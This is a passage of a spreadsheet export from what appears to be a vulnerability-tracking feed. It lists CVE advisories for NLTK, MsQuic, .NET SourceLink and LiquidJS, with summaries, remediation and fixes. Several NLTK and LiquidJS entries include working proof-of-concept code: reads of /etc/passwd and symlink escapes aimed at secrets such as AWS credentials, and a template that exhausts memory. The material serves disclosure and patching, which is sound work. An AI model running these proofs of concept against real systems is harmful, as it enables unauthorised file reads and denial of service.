Route all three call sites through `CorpusReader.open()` (or pass `required_root=self._root` to `validate_path()` directly, as `NKJPCorpusReader` already does), instead of `self.abspath()` plus raw `PathPointer.open()`.</t></is></c><c r="T1573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="1574"><c r="A1574" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1574" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D1574" s="5" t="inlineStr" /><c r="E1574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1574" s="5" t="inlineStr" /><c r="H1574" s="5" t="n"><v>0.004</v></c><c r="I1574" s="5" t="inlineStr" /><c r="J1574" s="5" t="inlineStr" /><c r="K1574" s="5" t="inlineStr" /><c r="L1574" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1574" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1574" s="5" t="inlineStr" /><c r="R1574" s="5" t="inlineStr" /><c r="S1574" s="5" t="inlineStr"><is><t>### Summary

Published `nltk==3.9.4` still contains several XML-reader entrypoints that build parser paths from caller-controlled selectors or trusted-looking index state without preserving the corpus-root boundary.

### Details

- **Vulnerability type:** Path traversal and trusted-root bypass
- **Affected component:** `FramenetCorpusReader.frame_by_name`, `FramenetCorpusReader.doc`, `FramenetCorpusReader.lu`, `NKJPCorpusReader.header`
- **Affected versions:** Published `3.9.4` reproduced. Current source `v3.10.0-rc2` acted as a negative control and blocked the same payloads.
- **Patched versions:** Patched in version 3.10.0, which includes the path-safety rejections seen in the release candidate.
- **Root cause:** Stable reader paths still construct raw XML filenames from unsafe selectors, poisoned index state, or unsafe file identifiers.

I confirmed four public stable entrypoints return parsed outside-root content: a parent-segment traversal frame name, a poisoned fulltext index filename, a poisoned LU id, and an unsafe NKJP header file identifier. Current source rejects the same payloads with explicit path-safety errors, which shows the bug is real but version-scoped to the published stable package.

### PoC

**Preconditions**
- The application exposes FrameNet or NKJP reader APIs while trusting NLTK to keep XML parsing inside a corpus root.

**Steps**
1. Create a minimal FrameNet or NKJP corpus root and place attacker-chosen XML files outside that root.
2. Feed unsafe selectors or poisoned index state into the relevant public stable `3.9.4` APIs.
3. Observe `frame_by_name`, `doc`, `lu(...).exemplars`, or `header` return parsed outside-root values.
4. Run the same payloads against current source and observe explicit path-safety rejections.

**Minimal reproducible excerpt**

```text
framenet_frame_definition FRAME_LEAK
framenet_doc_text DOC_LEAK
framenet_lu_text LU_LEAK
nkjp_header_title HEADER_LEAK
```

### Impact

Applications that process attacker-influenced FrameNet or NKJP corpus selectors or state can be made to parse XML outside the trusted corpus root through normal public reader responses.

### Remediation

Keep these reader paths on the same root-confinement model as `CorpusReader.open()` and `nltk.pathsec`. Reject unsafe path components before constructing filenames from frame names, document filenames, LU ids, or NKJP file identifiers.

### Resources

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1366-L1369
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1456-L1460
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1803-L1810
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L96-L103
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L251-L256
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/framenet.py#L1388-L1399
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/nkjp.py#L96-L128</t></is></c><c r="T1574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="1575"><c r="A1575" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1575" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D1575" s="5" t="inlineStr" /><c r="E1575" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1575" s="5" t="inlineStr" /><c r="H1575" s="5" t="n"><v>0.012</v></c><c r="I1575" s="5" t="inlineStr" /><c r="J1575" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K1575" s="5" t="inlineStr" /><c r="L1575" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M1575" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1575" s="5" t="inlineStr" /><c r="R1575" s="5" t="inlineStr" /><c r="S1575" s="5" t="inlineStr"><is><t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.

# Details

New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.

## Patches

- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)

# Impact

An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t></is></c><c r="T1575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="1576"><c r="A1576" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1576" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D1576" s="5" t="inlineStr" /><c r="E1576" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1576" s="5" t="inlineStr" /><c r="H1576" s="5" t="n"><v>0.005</v></c><c r="I1576" s="5" t="inlineStr" /><c r="J1576" s="5" t="inlineStr" /><c r="K1576" s="5" t="inlineStr" /><c r="L1576" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M1576" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1576" s="5" t="inlineStr" /><c r="R1576" s="5" t="inlineStr" /><c r="S1576" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), you're exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
2. If your application references the vulnerable package, update the package reference to the patched version. You can list the versions you have installed by running the `dotnet --info` command.

Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.

Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If you have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You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T1576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="1577"><c r="A1577" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1577" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D1577" s="5" t="inlineStr" /><c r="E1577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1577" s="5" t="inlineStr" /><c r="H1577" s="5" t="n"><v>0.006</v></c><c r="I1577" s="5" t="inlineStr" /><c r="J1577" s="5" t="inlineStr" /><c r="K1577" s="5" t="inlineStr" /><c r="L1577" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1577" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1577" s="5" t="inlineStr" /><c r="R1577" s="5" t="inlineStr" /><c r="S1577" s="5" t="inlineStr"><is><t>## Summary
Setting `nltk.pathsec.ENFORCE = True` is documented to sandbox all file access to allowed NLTK data directories and raise `PermissionError` on unauthorized access. However, `StreamBackedCorpusView` opens files via `builtins.open()` directly, bypassing `pathsec.validate_path()` entirely. An attacker who can influence the `fileid` argument can read arbitrary local files regardless of the `ENFORCE` setting.

## Details
`nltk/pathsec.py:274` defines the enforcement point:
```python
def open(file, mode="r", **kwargs):
    validate_path(file, context="pathsec.open")
    return builtins.open(file, mode=mode, **kwargs)
```

`StreamBackedCorpusView._open()` in `nltk/corpus/reader/util.py` bypasses this entirely for string paths:

```python
# line 171 — no validate_path() call
self._eofpos = os.stat(self._fileid).st_size

# line 208 — calls builtins.open directly
self._stream = open(self._fileid, "rb")
```

Also affected: `XMLCorpusView` and any corpus reader subclass that passes a raw string `fileid` to `StreamBackedCorpusView`.

## PoC
```python
# poc_server.py — StreamBackedCorpusView pathsec.ENFORCE bypass
from flask import Flask, request, jsonify
import nltk.pathsec as ps
from nltk.corpus.reader.util import StreamBackedCorpusView, read_line_block

# Strict mode enabled — expected to sandbox all file access
ps.ENFORCE = True

app = Flask(__name__)

@app.post("/read")
def read_file():
    fname = request.json.get("file")
    # fileid is user-controlled, passed directly to StreamBackedCorpusView
    # pathsec.ENFORCE = True is ignored — builtins.open() called internally
    view = StreamBackedCorpusView(fname, read_line_block, encoding="utf8")
    return jsonify({"file": fname, "content": view[0]})

app.run(host="0.0.0.0", port=8000)
```
Trigger:
```
curl -s -X POST http://localhost:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "/etc/passwd"}'
```
Confirmed on latest stable NLTK. No privileges required.

## Impact
- **Type:** Arbitrary Local File Read / Security Control Bypass
- **CWE:** CWE-22, CWE-284
- **OWASP:** A01:2021 – Broken Access Control

Affects web apps, REST APIs, and multi-tenant NLP pipelines where user input influences the `fileid` passed to NLTK corpus readers. Sensitive targets include `/etc/passwd`, `/proc/self/environ` (may contain `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, etc.), and application config files.

The core issue is that operators who explicitly set `ENFORCE = True` to harden production deployments are left with a **false security guarantee**.

**Suggested fix:** Replace `builtins.open()` and `os.stat()` in the string-path branch with `nltk.pathsec.open()` and `nltk.pathsec.validate_path()`.</t></is></c><c r="T1577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="1578"><c r="A1578" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1578" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D1578" s="5" t="inlineStr" /><c r="E1578" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1578" s="5" t="inlineStr" /><c r="H1578" s="5" t="n"><v>0.004</v></c><c r="I1578" s="5" t="inlineStr" /><c r="J1578" s="5" t="inlineStr" /><c r="K1578" s="5" t="inlineStr" /><c r="L1578" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1578" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1578" s="5" t="inlineStr" /><c r="R1578" s="5" t="inlineStr" /><c r="S1578" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T1578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="1579"><c r="A1579" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1579" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D1579" s="5" t="inlineStr" /><c r="E1579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1579" s="5" t="inlineStr" /><c r="H1579" s="5" t="n"><v>0.004</v></c><c r="I1579" s="5" t="inlineStr" /><c r="J1579" s="5" t="inlineStr" /><c r="K1579" s="5" t="inlineStr" /><c r="L1579" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M1579" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1579" s="5" t="inlineStr" /><c r="R1579" s="5" t="inlineStr" /><c r="S1579" s="5" t="inlineStr"><is><t>### Summary

The `join` filter (`src/filters/array.ts:8-13`) charges `memoryLimit` by array element **count**, not by the string length it produces, letting a template bypass a configured `memoryLimit` and allocate strings far past budget — bounded only by V8/process limits, not by `memoryLimit`.

### Details

```js
// src/filters/array.ts:8-13
export const join = argumentsToValue(function (this: FilterImpl, v: any[], arg: string) {
  const array = toArray(v)
  const sep = isNil(arg) ? ' ' : stringify(arg)
  const complexity = array.length * (1 + sep.length)   // element COUNT, not element sizes
  this.context.memoryLimit.use(complexity)
  return array.join(sep)                                // allocates sum(element lengths) + separators
})
```

`concat` (`array.ts:72`) is the enabler: it charges by element count too, but only copies references (cheap for both limiter and heap), so an array's element count can be doubled repeatedly at near-zero real cost. `join` is where the bug lives — it's the call that actually materializes all referenced content into one string, and its own charge (`array.length`) doesn't reflect that.

Same undercounting class as already-fixed `replace` (GHSA-mmg9-6m6j-jqqx), `replace_first` (GHSA-6q5m-63h6-5x4v), `date`/strftime (GHSA-hh27-hf48-9f5q) — `join` wasn't covered. Sibling `array_to_sentence_string` (`src/filters/string.ts:210`) has the identical defect.

### PoC

Live-reproduced against `liquidjs@10.27.1`, Node v24.3.0.

```javascript
const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e7 }); // 10M-unit DoS defense

const E = 5000, DOUBLINGS = 13;
const chunk = 'a'.repeat(E);
let tpl = `{%- assign s = "${chunk}" -%}{%- assign a = s | split: "NOSUCHSEP" -%}`;
for (let i = 0; i &lt; DOUBLINGS; i++) tpl += `{%- assign a = a | concat: a -%}`; // 1 -&gt; 8192 elements
tpl += `{%- assign out = a | join: "" -%}{{ out | size }}`;

const len = Number(engine.renderSync(engine.parse(tpl))); // succeeds — should be blocked
console.log('output length:', len);  // output length: 40960000
```

Verified by binary-search on `memoryLimit`: render is **blocked at 29573**, **succeeds at 29574** — confirming total charge across `split`+13×`concat`+`join` is exactly 29,574 units (split 5000, concat 16382, join 8192). Output length: **40,960,000** — **1385x** the total charged, &gt;4x the configured 10,000,000-unit limit. Scaling `DOUBLINGS` grows output exponentially for linear charge growth, driving toward gigabytes and a `RangeError: Invalid string length` / V8 OOM crash.

### Impact

Any app rendering attacker-influenced templates with `memoryLimit` set (LiquidJS docs list it as covering "array concat/join/strftime") can have that control bypassed by one short template, forcing allocation well past budget up to a process crash. `split`/`concat` are correctly charged; the gap is `join`'s own accounting of its own output. (LiquidJS's security-model docs call these limits "cooperative safeguards, not strict isolation" — doesn't change that `join`'s charge is wrong relative to what it allocates.)</t></is></c><c r="T1579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="1580"><c r="A1580" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1580" s="5" t="inlineStr"><is><t>CVE-2026-70613</t></is></c><c r="D1580" s="5" t="inlineStr" /><c r="E1580" s="5" t="inlineStr" /><c r="F1580" s="5" t="inlineStr" /><c r="G1580" s="5" t="inlineStr" /><c r="H1580" s="5" t="inlineStr" /><c r="I1580" s="5" t="inlineStr" /><c r="J1580" s="5" t="inlineStr" /><c r="K1580" s="5" t="inlineStr" /><c r="L1580" s="5" t="inlineStr" /><c r="M1580" s="5" t="inlineStr" /><c r="N1580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1580" s="5" t="inlineStr" /><c r="R1580" s="5" t="inlineStr" /><c r="S1580" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t></is></c></row><row r="1581"><c r="A1581" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1581" s="5" t="inlineStr"><is><t>CVE-2026-70614</t></is></c><c r="D1581" s="5" t="inlineStr" /><c r="E1581" s="5" t="inlineStr" /><c r="F1581" s="5" t="inlineStr" /><c r="G1581" s="5" t="inlineStr" /><c r="H1581" s="5" t="inlineStr" /><c r="I1581" s="5" t="inlineStr" /><c r="J1581" s="5" t="inlineStr" /><c r="K1581" s="5" t="inlineStr" /><c r="L1581" s="5" t="inlineStr" /><c r="M1581" s="5" t="inlineStr" /><c r="N1581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1581" s="5" t="inlineStr" /><c r="R1581" s="5" t="inlineStr" /><c r="S1581" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t></is></c></row><row r="1582"><c r="A1582" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1582" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D1582" s="5" t="inlineStr" /><c r="E1582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1582" s="5" t="inlineStr" /><c r="H1582" s="5" t="n"><v>0.002</v></c><c r="I1582" s="5" t="inlineStr" /><c r="J1582" s="5" t="inlineStr" /><c r="K1582" s="5" t="inlineStr" /><c r="L1582" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1582" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1582" s="5" t="inlineStr" /><c r="R1582" s="5" t="inlineStr" /><c r="S1582" s="5" t="inlineStr"><is><t>### Summary
`nltk.corpus.reader.api.CorpusReader.open()` can be used to read files outside the intended corpus root via a symlink placed inside that root. Although NLTK blocks absolute paths and `..` traversal, the current boundary check is only lexical and does not account for symlink resolution. This leads to an arbitrary local file read / filesystem sandbox bypass for applications that rely on `CorpusReader` or `FileSystemPathPointer` to restrict file access.

### Details
The vulnerable flow is:

- [`nltk/corpus/reader/api.py:222`](/mnt/Data/my_brains/test/nltk/nltk/corpus/reader/api.py#L222)
  - `CorpusReader.open()` blocks absolute paths and `..`, then calls `self._root.join(file).open()`

- [`nltk/data.py:398`](/mnt/Data/my_brains/test/nltk/nltk/data.py#L398)
  - `FileSystemPathPointer.join()` joins the requested file ID and checks whether the resulting path still appears to remain under the configured root

The problem is that the check is based on the lexical path after `os.path.normpath()`, not on the resolved path after following symlinks.

Current behavior:

1. `CorpusReader.open()` rejects:
   - absolute paths
   - `..` path traversal
2. `FileSystemPathPointer.join()` computes:
   - `joined = os.path.normpath(os.path.join(self._path, fileid))`
   - `root = os.path.normpath(self._path)`
3. It allows the access if `joined` starts with `root`

This misses the case where a path stays inside the root lexically, but resolves outside the root via a symlink already present under the allowed directory.

Example:

```text
JOINED=/tmp/nltk-root/link/secret.txt
REALPATH=/tmp/outside/secret.txt
```

`JOINED` still appears to be inside the root, but `REALPATH` is outside it.

This is distinct from simple `../` traversal:

- the file ID is not absolute
- the file ID does not contain `..`
- the escape only happens after filesystem resolution of a symlink under the allowed root

### PoC
Reproduced in an isolated Docker sandbox using the local `nltk` clone.

Minimal Python PoC:

```python
import os
import tempfile
from nltk.corpus.reader.api import CorpusReader

root = tempfile.mkdtemp(prefix="nltk-root-")
outside_dir = tempfile.mkdtemp(prefix="nltk-out-")
outside_file = os.path.join(outside_dir, "secret.txt")

with open(outside_file, "w") as f:
    f.write("secret-data")

os.symlink(outside_dir, os.path.join(root, "link"))

corpus = CorpusReader(root, ["link/secret.txt"])
with corpus.open("link/secret.txt") as f:
    print(f.read())
```

Observed result:

```text
secret-data
```

Docker re-test output:

```text
ROOT=/tmp/nltk-root-jjxay3if
OUTSIDE_DIR=/tmp/nltk-out-1kef36e0
JOINED=/tmp/nltk-root-jjxay3if/link/secret.txt
REALPATH=/tmp/nltk-out-1kef36e0/secret.txt
READ_OK=secret-data
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

Additional impact validation using a system file:

```text
ROOT=/tmp/nltk-root-_h5x4m19
JOINED=/tmp/nltk-root-_h5x4m19/hostfile
REALPATH=/etc/hostname
HOSTNAME_READ=48dafb244af3
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

This shows that the issue is not limited to attacker-created files outside the root; it can also read existing system files that are readable by the application user.

### Impact
This is an arbitrary local file read / symlink escape issue.

Who is impacted:

- applications that accept attacker-controlled corpus directories, extracted datasets, or package contents
- applications that rely on NLTK corpus readers as a trust boundary for file access
- any deployment where an attacker can place or influence files inside the allowed corpus root

Practical impact includes disclosure of:

- application secrets stored on disk
- local configuration files
- private datasets
- process-exposed files such as `/proc/self/environ`
- system files readable by the running user

